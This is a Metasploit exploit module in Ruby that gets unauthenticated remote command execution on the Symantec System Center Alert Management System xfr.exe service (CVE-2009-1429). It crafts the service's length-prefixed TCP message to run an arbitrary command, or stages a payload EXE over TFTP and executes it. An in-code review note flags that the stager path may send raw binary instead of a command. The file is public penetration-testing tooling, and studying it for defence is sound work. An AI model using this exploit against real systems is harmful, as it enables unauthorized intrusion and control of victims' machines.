Path: blob/master/modules/exploits/windows/antivirus/ams_xfr.rb
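##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote command execution against the Symantec System Center Alert Management
# System "xfr.exe" listener (CVE-2009-1429).
#
# The service accepts a small length-prefixed message on TCP/12174 and runs the
# embedded command; nothing in this module authenticates to it, so the only
# precondition is network reachability of the port. The module either sends an
# operator-supplied CMD, or drives the TFTP command stager to upload a payload
# EXE and then asks the service to run it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # The wire format carries the command length in a single byte, and that byte
  # also counts the trailing space and NUL that execute_command appends.
  LENGTH_OVERHEAD = 2
  MAX_COMMAND_BYTES = 0xff - LENGTH_OVERHEAD

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
        'Description' => %q{
          Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
          because the application fails to properly sanitize user-supplied input.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-1429' ],
          [ 'BID', '34671' ],
          [ 'OSVDB', '54157' ],
          [ 'ZDI', '09-060' ],
          [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
        ],
        'Targets' => [
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        'CmdStagerFlavor' => 'tftp',
        'Privileged' => true,
        'Platform' => 'win',
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-04-28',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(12174),
        # When set, CMD is sent verbatim to the service instead of staging a payload.
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
      ]
    )
  end

  # Uploads the payload through the TFTP command stager and then asks the
  # service to run it.
  #
  # A SRVHOST of 0.0.0.0 is not an address the target can fetch from, so the
  # local source address toward the target is substituted for the TFTP host
  # in that case.
  def windows_stager
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ temp: '.', tftphost: tftphost })
    @payload_exe = generate_payload_exe

    # NOTE(review): generate_payload_exe comes from Msf::Exploit::EXE and is
    # presumably the generated EXE bytes rather than the name of the staged
    # file, so what reaches execute_command here looks like a raw binary, not
    # a command that starts the uploaded payload — confirm against the
    # CmdStager mixin before relying on this path.
    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  # Sends one command to the xfr.exe listener and reports whether it answered.
  #
  # Message layout, as written below: four NUL bytes, a one-byte length, a NUL,
  # the command followed by a space, and a terminating NUL. The length byte
  # covers the command plus the trailing space and NUL.
  #
  # @param cmd [String] command line for the target to run
  # @param opts [Hash] accepted for CmdStager compatibility; unused here
  # @raise [Msf::Exploit::Failed] via fail_with when cmd cannot be represented
  #   in the single-byte length field
  def execute_command(cmd, opts = {})
    # Integer#chr raises RangeError above 0xff and a wrapped length would put a
    # silently truncated command on the wire, so reject oversized input before
    # opening the connection. bytesize is used because the field describes
    # bytes, not characters.
    if cmd.bytesize > MAX_COMMAND_BYTES
      fail_with(Failure::BadConfig, "Command is #{cmd.bytesize} bytes; the protocol's one-byte length field allows at most #{MAX_COMMAND_BYTES}")
    end

    data = [0x00000000].pack('V')
    data << (cmd.bytesize + LENGTH_OVERHEAD).chr
    data << "\x00"
    data << cmd + " "
    data << "\x00"

    connect
    begin
      sock.put(data)

      # Any reply at all is taken as success; the service is not parsed further.
      res = sock.get_once
      if res
        print_good("Got data, execution successful!")
      else
        print_error("Did not receive data. Failed?")
      end
    ensure
      # Close the session even when the send or the read raises.
      disconnect
    end
  end

  # Entry point: run the operator's CMD when one is given, otherwise stage a
  # payload for the selected target and start the handler for it.
  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'win'
      windows_stager
    else
      fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler
  end
end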